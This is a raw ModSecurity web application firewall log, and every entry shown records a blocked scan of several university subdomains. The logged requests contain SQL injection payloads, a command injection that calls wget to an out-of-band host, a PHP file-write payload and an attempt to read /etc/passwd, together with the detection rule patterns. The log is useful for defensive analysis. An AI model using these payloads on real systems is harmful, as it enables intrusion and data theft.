[Tue Aug 29 11:34:54.340288 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bsCo-f0AAATlLFIAAAAq"]
[Tue Aug 29 11:34:54.342390 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bsCo-f0AAAUTiX4AAABJ"]
[Tue Aug 29 11:34:55.300540 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAUNaksAAABF"]
[Tue Aug 29 11:34:55.308005 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAATZp6sAAAAf"]
[Tue Aug 29 11:34:55.335937 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgdqiajt3m66g1i.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11b8Co-f0AAATUxRQAAAAW"]
[Tue Aug 29 11:34:55.381832 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAUKhAYAAABC"]
[Tue Aug 29 11:34:55.384670 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAT9PPEAAAA1"]
[Tue Aug 29 11:34:55.390776 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAULx8YAAABD"]
[Tue Aug 29 11:34:56.311614 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAATfd38AAAAk"]
[Tue Aug 29 11:34:56.311616 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAATlLFQAAAAq"]
[Tue Aug 29 11:34:56.317123 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAAQKOwIAAAAs"]
[Tue Aug 29 11:34:56.340755 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUdm4MAAABS"]
[Tue Aug 29 11:34:56.341300 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUIz74AAABA"]
[Tue Aug 29 11:34:56.342457 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAATPtSYAAAAM"]
[Tue Aug 29 11:34:56.342677 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUXLjcAAABM"]
[Tue Aug 29 11:34:56.343698 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAATge6EAAAAl"]
[Tue Aug 29 11:34:56.343941 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11cMCo-f0AAATlLFUAAAAq"]
[Tue Aug 29 11:34:56.344557 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAASOUpcAAAAR"]
[Tue Aug 29 11:34:56.345463 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAATavvAAAAAg"]
[Tue Aug 29 11:34:56.346168 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAATmZeEAAAAr"]
[Tue Aug 29 11:34:56.349487 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAATzVI0AAAAx"]
[Tue Aug 29 11:34:56.353941 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUZcF4AAABO"]
[Tue Aug 29 11:34:56.369775 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAT9PPIAAAA1"]
[Tue Aug 29 11:34:57.305503 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ccCo-f0AAATOA@QAAAAH"]
[Tue Aug 29 11:34:57.307675 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11ccCo-f0AAATlLFYAAAAq"]
[Tue Aug 29 11:34:57.315515 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAPDoQIAAAAP"]
[Tue Aug 29 11:34:57.316586 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAATge6IAAAAl"]
[Tue Aug 29 11:34:57.316934 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAATmZeIAAAAr"]
[Tue Aug 29 11:34:57.323032 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUNak8AAABF"]
[Tue Aug 29 11:34:57.329534 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAASEJYAAAAAE"]
[Tue Aug 29 11:34:57.331890 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAShCZ4AAAAi"]
[Tue Aug 29 11:34:57.339516 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAULx8gAAABD"]
[Tue Aug 29 11:34:57.339780 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAPLwKAAAAAX"]
[Tue Aug 29 11:34:57.348753 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAT@KwIAAAA2"]
[Tue Aug 29 11:34:57.349638 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAUIz78AAABA"]
[Tue Aug 29 11:34:57.351960 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAUUZ8gAAABK"]
[Tue Aug 29 11:34:57.353083 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAATge6MAAAAl"]
[Tue Aug 29 11:34:57.371183 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAATYeE0AAAAd"]
